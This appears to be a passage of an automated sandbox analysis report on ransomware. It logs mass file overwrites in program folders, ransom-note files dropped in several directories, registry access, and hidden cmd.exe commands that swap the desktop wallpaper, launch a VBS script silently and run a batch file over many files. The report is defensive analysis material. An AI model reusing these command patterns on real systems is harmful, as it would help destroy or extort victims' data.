| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\ui-strings.js | size = 2554 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\stop_collection_data.gif | size = 2331 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | size = 3538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\DarkTheme.acrotheme | size = 8275 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-tool-view.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons2x.png | size = 2601 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\ui-strings.js | size = 2531 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugin.js | size = 2337 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\ui-strings.js | size = 2568 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\ui-strings.js | size = 2541 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\ui-strings.js | size = 2550 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js | size = 2682 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\ui-strings.js | size = 2549 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | size = 2545 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif | size = 1480 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png | size = 2027 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\ui-strings.js | size = 2568 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\adobepdf.xdc | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js | size = 2659 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud.png | size = 3538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\ui-strings.js | size = 2584 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 17800 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 61440 |
|
2 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | size = 8192 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js | size = 2657 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js | size = 2538 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\large_trefoil.png | size = 3436 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js | size = 2682 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_hover.png | size = 1804 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js | size = 2640 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions.png | size = 2974 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png | size = 1712 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-up-pressed.gif | size = 1473 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\ui-strings.js | size = 2640 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\ui-strings.js | size = 2616 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js | size = 2733 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\ui-strings.js | size = 2668 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\ui-strings.js | size = 2788 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js | size = 2373 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\ui-strings.js | size = 2552 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-selector.js | size = 5378 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js | size = 2799 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\ui-strings.js | size = 2733 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js | size = 2239 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\ui-strings.js | size = 5218 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\ReadOutLoud.api | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\ui-strings.js | size = 2570 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-fr\ui-strings.js | size = 5269 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js | size = 2765 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\ui-strings.js | size = 2616 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\combinepdf-selector.js | size = 4966 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js | size = 5069 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js | size = 4926 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif | size = 1499 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\ui-strings.js | size = 2762 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js | size = 2849 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png | size = 2099 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef.css | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!README_SPCT!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\!README_SPCT!.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js | size = 2772 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js | size = 5205 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\ui-strings.js | size = 2616 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-114x114-precomposed.png | size = 6189 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | size = 5085 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\tr-tr\ui-strings.js | size = 5174 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css | size = 5532 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js | size = 2691 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\ui-strings.js | size = 2854 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons.png | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\ui-strings.js | size = 2650 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main-selector.css | size = 3021 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\cs-cz\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | size = 9608 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js | size = 32768 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\cloud_icon.png | size = 2071 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png | size = 1984 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | size = 2780 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js | size = 2747 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js | size = 2761 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js | size = 5190 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css | size = 5958 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png | size = 1968 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | size = 4096 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\!README_SPCT!.rtf | size = 2573 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\!README_SPCT!.rtf | size = 3135 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js | size = 2729 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | size = 34184 |
|
1 | |
| Write | C:\Program Files\Java\jre1.8.0_131\lib\rt.jar | size = 61440 |
|
5 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!README_SPCT!.rtf | size = 5512 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\!README_SPCT!.rtf | size = 16384 |
|
1 | |
| Write | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | size = 5512 |
|
1 | |
|
For performance reasons, the remaining 4001 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (12)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Embarcadero\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\CodeGear\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Locales | - |
|
2 | |
| Open Key | HKEY_CURRENT_USER\Software\Borland\Delphi\Locales | - |
|
2 |
Process (32)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\CIiHmnxMn6Ps\Desktop\mngrxc.exe" "C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe" | os_pid = 0x2f4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\NWsErbnA.exe" -n | os_pid = 0x340, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_SHOW |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\iTIcBPF1.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f | os_pid = 0xe8c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\CIiHmnxMn6Ps\AppData\Roaming\TpKMXrXl.vbs" | os_pid = 0x3c0, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Journal.exe" | os_pid = 0xcd4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp" | os_pid = 0xb70, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Multimedia Platform\separate.exe" | os_pid = 0x1b4, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Java\se-viii.exe" | os_pid = 0xeb8, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui" | os_pid = 0x150, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp" | os_pid = 0x764, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\recorder.exe" | os_pid = 0x524, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui" | os_pid = 0xc54, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp" | os_pid = 0xa84, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
| Create | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" | os_pid = 0x85c, creation_flags = CREATE_NEW_CONSOLE, CREATE_NORMAL_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE |
|
1 | |
